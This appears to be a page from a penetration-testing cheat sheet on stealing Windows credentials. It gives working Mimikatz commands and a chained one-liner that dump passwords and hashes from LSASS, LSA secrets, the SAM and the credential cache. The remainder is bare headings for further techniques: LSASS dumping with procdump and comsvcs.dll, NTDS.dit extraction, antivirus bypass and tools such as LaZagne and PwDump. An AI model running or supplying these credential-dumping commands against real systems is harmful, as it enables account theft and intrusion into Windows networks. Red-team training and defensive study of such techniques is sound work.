Stealing Windows Credentials
Credentials Mimikatz
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"Invoke-Mimikatz
Credentials with Meterpreter
Bypassing AV
Procdump + Mimikatz
Dumping lsass with comsvcs.dll
Dumping lsass with Task Manager
Dumping lsass with procdump
Dumpin lsass with PPLBlade
CrackMapExec
Dump SAM hashes
Dump LSA secrets
Dump the NTDS.dit from target DC
Dump the NTDS.dit password history from target DC
Show the pwdLastSet attribute for each NTDS.dit account
Stealing SAM & SYSTEM
From Registry
Volume Shadow Copy
Using vssadmin
Invoke-NinjaCopy
Active Directory Credentials - NTDS.dit
Decrypting the hashes inside NTDS.dit
Copying NTDS.dit using Ntdsutil
Extracting hashes from NTDS.dit
Extracting domain objects from NTDS.dit to an SQLite database
Lazagne
Other tools for extracting credentials from SAM and LSASS
Windows credentials Editor (WCE)
fgdump
PwDump
PwDump7
Defenses
Last updated

